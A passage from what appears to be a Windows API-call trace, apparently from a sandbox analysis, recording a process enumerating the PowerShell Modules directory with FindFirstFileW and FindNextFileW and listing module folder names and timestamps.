cAlternateFileName="MICROS~1.SEC")) returned 1 [0176.669] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0176.670] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0176.670] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0176.670] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0176.670] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0176.670] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0176.670] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0176.670] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0176.671] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0176.672] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0176.672] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0176.672] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0176.672] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0176.672] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0176.673] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0176.673] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0176.673] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0176.673] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0176.673] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0176.673] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0176.674] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0176.674] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0176.674] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0176.674] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0176.674] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0176.674] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0176.674] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0176.674] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0176.675] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0176.675] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0176.675] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0176.675] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0176.675] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0176.675] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0176.676] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0176.676] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0176.676] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0176.676] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0176.676] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0176.677] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0176.677] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.677] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5f0) returned 1 [0176.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5b0) returned 1 [0176.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de6a0) returned 1 [0176.678] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7de190, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0176.678] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b7de130, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", lpFilePart=0x0) returned 0x33 [0176.679] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*", lpFindFileData=0x1b7de340 | out: lpFindFileData=0x1b7de340*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.680] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.680] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0176.680] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0176.680] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, 